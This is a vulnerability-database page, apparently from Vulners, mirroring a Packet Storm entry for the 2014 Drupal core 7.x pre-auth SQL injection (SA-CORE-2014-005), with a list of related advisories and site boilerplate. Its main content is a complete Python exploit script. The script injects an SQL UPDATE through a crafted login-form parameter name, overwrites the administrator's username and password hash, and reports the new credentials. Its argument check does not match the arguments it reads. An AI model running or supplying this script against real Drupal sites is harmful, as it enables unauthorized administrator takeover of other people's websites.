Lucene search
+L

Drupal Core 7.32 SQL Injection

🗓️ 17 Oct 2014 00:00:00Reported by fyukyukType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 75 Views

Drupal Core 7.32 SQL Injection exploit via SA-CORE-2014-00

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Drupal 7.31 CORE pre Auth SQL Injection Vulnerability
17 Oct 201400:00
zdt
zdt
zdt
Drupal HTTP Parameter Key/Value SQL Injection Vulnerability
18 Oct 201400:00
zdt
zdt
zdt
Drupal < 7.32 Pre Auth SQL Injection Vulnerability
4 Nov 201400:00
zdt
zdt
zdt
Drupal 7.0 < 7.31 - Drupalgeddon SQL Injection (Admin Session) Exploit
29 Mar 201800:00
zdt
freebsd
FreeBSD
drupal7 -- SQL injection
15 Oct 201400:00
freebsd
githubexploit
GithubExploit
Exploit for SQL Injection in Drupal
13 Sep 202618:46
githubexploit
archlinux
ArchLinux
drupal: pre-auth sql injection
16 Oct 201400:00
archlinux
gitee
Gitee
Exploit for SQL Injection in Drupal
6 Oct 202020:54
gitee
circl
Circl
CVE-2014-3704
16 Oct 201400:00
circl
cisa
CISA
Drupal Releases Security Advisory
17 Oct 201400:00
cisa
Rows per page
`#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005  
#Creditz to https://www.reddit.com/user/fyukyuk  
import urllib2,sys  
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py  
host = sys.argv[1]  
user = sys.argv[2]  
password = sys.argv[3]  
if len(sys.argv) != 3:  
print "host username password"  
print "http://nope.io admin wowsecure"  
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()  
target = '%s/?q=node&destination=node' % host  
post_data = "name[0%20;update+users+set+name%3d\'" \  
+user \  
+"'+,+pass+%3d+'" \  
+hash[:55] \  
+"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"  
content = urllib2.urlopen(url=target, data=post_data).read()  
if "mb_strlen() expects parameter 1" in content:  
print "Success!\nLogin now with user:%s and pass:%s" % (user, password)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Oct 2014 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.99974
75